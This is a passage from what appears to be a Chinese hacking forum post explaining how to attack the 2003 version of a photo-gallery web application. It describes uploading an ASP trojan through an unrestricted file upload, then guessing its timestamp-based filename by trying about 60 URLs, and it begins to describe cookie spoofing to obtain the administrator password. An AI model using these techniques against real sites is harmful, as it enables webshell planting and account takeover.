ExtName ExtName = LCase(FileName) ExtName = right(ExtName,3) ExtName = right(ExtName,3-Instr(ExtName,".")) GetExtendName = ExtName end function %> 原来在upfile.asp接收表单程序中,上传文件的3个字母的后缀名没有变化,只是把前面改为了服务器的当前时间中所有数字加个0而已。像服务器的当前时间为2003年的10月8日的23:19:02,我们传了一个asp程序,那么就会在http://目标网站的写真程序的web目录/UPLOAD/imgwsf/这个目录下生成20031082319020.asp这个文件。 我们看好了时间,现在是2003年10月8日的22:22分(秒数我们不可能估计得准),我们上传一个asp木马,于是我们只要依次来试60次提交的url http://目标网站的写真程序/UPLOAD/imgwsf/20031082222010.asp http://目标网站的写真程序/UPLOAD/imgwsf/20031082222020.asp http://目标网站的写真程序/UPLOAD/imgwsf/20031082222030.asp http://目标网站的写真程序/UPLOAD/imgwsf/20031082222040.asp ...... http://目标网站的写真程序/UPLOAD/imgwsf/20031082222100.asp http://目标网站的写真程序/UPLOAD/imgwsf/20031082222110.asp ...... http://目标网站的写真程序/UPLOAD/imgwsf/20031082222600.asp 就肯定会找到这一asp木马了。这个漏洞倒是有趣,但还是有两个问题,一个是我们仍然要猜n次后才能得到asp木马的url;第2个是如果服务器的时间如果比当前北京时间慢或快很多的话就麻烦了,我们不知不猜测到几时才能猜到上传后的木马名了。    虽然有了这两个漏洞,但是利用起来都很麻烦呀,可不像我题目写的那样轻取金梅写真程序2003版。于是聪明人说了,你肯定发现了第3个漏洞。一点也没有错,最后我正是利用的cookie欺骗取得了金梅写真程序2003版的管理员密码。我们来看下change.asp的部份源码:

用 户:">

 密码:"> 密码:
收藏 分享

返回列表 回复 发帖